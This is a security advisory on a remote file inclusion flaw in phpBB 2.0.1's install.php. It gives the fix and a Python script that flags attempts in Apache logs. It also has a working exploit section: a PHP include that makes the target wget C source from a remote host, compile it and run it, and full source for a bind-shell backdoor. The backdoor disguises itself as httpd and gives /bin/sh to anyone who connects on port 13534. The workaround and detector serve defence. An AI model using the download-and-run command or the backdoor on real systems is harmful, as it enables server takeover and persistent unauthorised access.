phpBB is one of the most popular PHP bulletin board systems. When "allow_url_fopen" and "register_globals" are both set to "On" in php.ini, the install.php script shipped with phpBB contains a remote file inclusion vulnerability: it includes $phpbb_root_dir . 'includes/functions_selects.' . $phpEx, but $phpbb_root_dir is never assigned by the script (the variable it actually defines is $phpbb_root_path). With register_globals on, an attacker can supply phpbb_root_dir as a query-string parameter, and with allow_url_fopen on, include() will fetch the resulting path over HTTP. The attacker's own functions_selects.php is therefore downloaded from a host of their choosing and executed on the target with the web server's privileges.
Credit:
The information has been provided by Morris Chang.
Vulnerable systems:
* phpBB 2.0.1
Workaround:
Set "allow_url_fopen" to "Off" and "register_globals" to "Off" in php.ini. After you have completed the installation process, remove or rename the install.php script. Alternatively, modify install.php so that the include uses the variable the script actually defines, $phpbb_root_path, instead of the unset $phpbb_root_dir. The vulnerable line must be replaced, not supplemented: keeping it alongside the corrected line leaves the remote include in place.
Find:
include($phpbb_root_dir . 'includes/functions_selects.'.$phpEx);
Replace with:
include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);
Example:
Create the following file on a web server you control (MYBOX below):
--------------------includes/functions_selects.php--------------
<? passthru("uname -a"); ?>
-----------------------------------------
Then request the following URL from the target:
http://URL/install.php?phpbb_root_dir=http://MYBOX/
install.php fetches http://MYBOX/includes/functions_selects.php and executes it, so the output of uname -a on the target appears in the response. The "headers already sent" warnings that follow are a side effect of the injected output being emitted before install.php sets its session headers, and they conveniently reveal the remote path that was included:
Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686 unknown
Warning: Cannot add header information - headers already sent by (output started at http://host/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 182
Warning: Cannot add header information - headers already sent by (output started at http://host/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 183
Warning: Cannot add header information - headers already sent by (output started at http://host/includes/functions_selects.php:1) in /home/morris/public_html/tmp/phpBB2/install.php on line 346
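Because every exploitation attempt has to pass the remote URL through the query string of install.php, the attack leaves a distinctive trace in the web server's access log. The following detection script is an added example for this advisory, not code from the original report or from phpBB. It parses Apache combined-format log lines, looks for requests to install.php that hand a URL with a stream-wrapper scheme (http://, ftp:// and so on) to phpbb_root_dir or phpbb_root_path, and returns the offending requests. The log lines, client addresses and the attacker.example host name are constructed for illustration.

```python
"""Flag attempts at the phpBB 2.0.1 install.php remote file inclusion in
Apache combined-format access logs.

Added example for this advisory; not part of the original report or of
phpBB. All log lines below are constructed, and attacker.example is a
placeholder host name.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Parameters install.php feeds into include(). phpbb_root_dir is the one the
# advisory describes (never assigned by the script, so register_globals lets
# the client set it); phpbb_root_path is the legitimate name and is watched
# too, since register_globals would let a client override it just as easily.
WATCHED_PARAMS = ("phpbb_root_dir", "phpbb_root_path")

# Any "scheme://" prefix that allow_url_fopen would turn into a remote fetch.
# A value such as "../" is directory traversal rather than a remote include
# and is deliberately not matched here.
REMOTE_SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.IGNORECASE)

# Apache combined log format: client, ident, user, [time], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample log: one normal installer load, the request from the
# advisory's example (percent-encoded as a browser sends it), the same trick
# via the legitimate variable name and the ftp wrapper, a traversal value,
# and an unrelated page.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Apr/2002:11:40:01 +0000] "GET /phpBB2/install.php HTTP/1.0" 200 4123',
    '192.0.2.77 - - [14/Apr/2002:11:42:13 +0000] "GET /phpBB2/install.php?phpbb_root_dir=http%3A%2F%2Fattacker.example%2F HTTP/1.0" 200 512',
    '192.0.2.77 - - [14/Apr/2002:11:43:02 +0000] "GET /phpBB2/install.php?phpbb_root_path=ftp://attacker.example/ HTTP/1.0" 200 512',
    '10.0.0.5 - - [14/Apr/2002:11:45:30 +0000] "GET /phpBB2/install.php?phpbb_root_dir=../ HTTP/1.0" 200 4123',
    '10.0.0.9 - - [14/Apr/2002:11:46:00 +0000] "GET /phpBB2/viewtopic.php?t=1 HTTP/1.1" 200 9001',
]


def find_rfi_attempts(lines):
    """Return (client_ip, request_target, parameter, value) for every request
    that passes a remote URL into one of the watched install.php parameters."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        target = m.group("target")
        parts = urlsplit(target)
        # Only the installer script is affected; match on the final path component.
        if parts.path.rsplit("/", 1)[-1] != "install.php":
            continue
        # parse_qs percent-decodes once, the same way PHP populates $_GET.
        params = parse_qs(parts.query, keep_blank_values=True)
        for name in WATCHED_PARAMS:
            for value in params.get(name, []):
                # install.php would run include("<value>includes/functions_selects.php"),
                # so a value with a scheme means code fetched from a remote host.
                if REMOTE_SCHEME.match(value):
                    hits.append((m.group("ip"), target, name, value))
    return hits


if __name__ == "__main__":
    for ip, target, name, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ip} -> {name}={value!r} in {target}")
```

Run it against a real log with `find_rfi_attempts(open("access_log"))`. A hit on a server where install.php still exists should be treated as likely compromise, not just an attempt: if both php.ini options were on, the included code has already run.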
Exploit:
The following PHP, served in place of the uname -a example above, makes the target download a C source file, compile it, delete the source and run the resulting binary, which opens a bind-shell backdoor on TCP port 13534 of the compromised server. The names elided with "..." are the attacker's choice of output binary.
PHP code:
<? passthru("cd /tmp && /usr/bin/wget http://host/a.c && gcc a.c -o ... && rm /tmp/a.c && /tmp/... "); ?>
Backdoor code (the missing headers and the socklen_t type have been added so it compiles cleanly on a current toolchain; the behaviour is unchanged):
/*
 * Unknown author.
 *
 * Bind shell: listens on TCP port PORT on all interfaces, daemonises, and
 * hands every client that connects a /bin/sh whose stdin, stdout and stderr
 * are attached to the socket.
 */
#define PORT 13534
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int soc_des, soc_cli, soc_rc, server_pid, cli_pid;
socklen_t soc_len;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;

int main(int argc, char *argv[])
{
    int i;

    /* Wipe the command line and masquerade as an Apache worker in ps output.
     * The new name is copied into the original argv[0] buffer, so it only
     * fits cleanly if the binary was started with a path at least that long. */
    for (i = 0; i < argc; i++) {
        memset(argv[i], '\x0', strlen(argv[i]));
    }
    strcpy(argv[0], "/usr/local/apache/bin/httpd");

    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (soc_des == -1)
        exit(-1);
    bzero((char *) &serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);   /* bind on every interface */
    serv_addr.sin_port = htons(PORT);
    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
    if (soc_rc != 0)
        exit(-1);

    /* Double fork and detach from the controlling terminal so the listener
     * outlives the web server request that started it and ignores SIGHUP. */
    if (fork() != 0)
        exit(0);
    setpgrp();
    signal(SIGHUP, SIG_IGN);
    if (fork() != 0)
        exit(0);

    soc_rc = listen(soc_des, 5);
    if (soc_rc != 0)
        exit(0);

    while (1) {
        soc_len = sizeof(client_addr);
        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
        if (soc_cli < 0)
            exit(0);
        cli_pid = getpid();
        server_pid = fork();
        if (server_pid != 0) {
            /* Parent: tie the shell's standard streams to the client socket
             * and become /bin/sh; the child keeps accepting connections. */
            dup2(soc_cli, 0);
            dup2(soc_cli, 1);
            dup2(soc_cli, 2);
            execl("/bin/sh", "sh", (char *) 0);
            close(soc_cli);
            exit(0);
        }
        close(soc_cli);
    }
}